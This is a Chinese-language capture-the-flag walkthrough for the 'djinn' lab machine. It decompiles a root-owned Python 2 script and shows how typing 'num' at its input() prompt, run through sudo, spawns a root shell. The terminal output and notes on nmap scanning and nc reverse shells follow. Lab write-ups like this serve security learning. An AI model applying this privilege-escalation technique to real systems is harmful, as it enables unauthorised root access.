推荐在windows上使用python2.7进行反编译
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:25:05) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 21:05:18
from getpass import getuser
from os import system
from random import randint
def naughtyboi():
print 'Working on it!! '
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
def readfiles():
user = getuser()
path = input('Enter the full of the file to read: ')
print 'User %s is not allowed to read %s' % (user, path)
def options():
print 'What do you want to do ?'
print '1 - Be naughty'
print '2 - Guess the number'
print '3 - Read some damn files'
print '4 - Work'
choice = int(input('Enter your choice: '))
return choice
def main(op):
if op == 1:
naughtyboi()
elif op == 2:
guessit()
elif op == 3:
readfiles()
elif op == 4:
print 'work your ass off!!'
else:
print 'Do something better with your life'
if __name__ == '__main__':
main(options())
阅读源码发现其中的字符串内容与/root/lago
的字符串内容一致
def guessit():
num = randint(1, 101)
print 'Choose a number between 1 to 100: '
s = input('Enter your number: ')
if s == num:
system('/bin/sh')
else:
print 'Better Luck next time'
此处若是输入num
则会运行system('/bin/sh')
若是用root的身份运行system('/bin/sh')
那么就会得到一个root的shell
使用/root/lago
进行提权并获取root.txt
sam@djinn:/opt/80$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Fri Sep 10 11:13:19 IST 2021
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
注意事项
nmap扫描如果不加服务识别可能无法将7331服务识别为http服务
└─# nmap -p- -T4 192.168.5.130 127 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-10 13:44 CST
Nmap scan report for 192.168.5.130
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:EE:7F:B0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
nc反弹shell之后如果不切换shell可能无法使用su命令
www-data@djinn:/opt/80$ su root
su root
su: must be run from a terminal